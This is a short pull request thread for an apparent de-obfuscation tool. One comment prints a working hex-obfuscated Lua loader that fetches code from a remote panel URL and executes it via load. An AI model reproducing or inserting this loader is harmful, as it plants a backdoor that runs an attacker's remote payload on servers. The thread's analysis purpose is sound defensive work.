### PR TITLE
Added half de-obfuscation, so just get the char to \x41...

### PR DESCRIPTION
**Pull request by exersalza**
Eah yeah

### CODE REVIEW

**Review by exersalza — COMMENTED** [review]
LTGM.

**Comment by ZerXGIT** [comment]
LGTM

**Review by ZerXGIT — APPROVED** [review]
Good

**Review by ZerXGIT — APPROVED** [review]

**Comment by exersalza** [comment]
I've added some stuff for variable de obfuscation


This (with the replaced hex codes) is how i plan it to look like @ZerXGIT 
`local rizz = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} rizz[4][rizz[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x5a\x43\x73\x4d\x69\x43", function (gyros, gg) if (gg == rizz[6] or gg == rizz[5]) then return end rizz[4][rizz[2]](rizz[4][rizz[3]](gg))() end)`

**Review by exersalza — COMMENTED** [review]
yep @ZerXGIT look at dis

**Comment by exersalza** [comment]
commit message 5

**Review by ZerXGIT — APPROVED** [review]
LGTM

**Pull request merged**
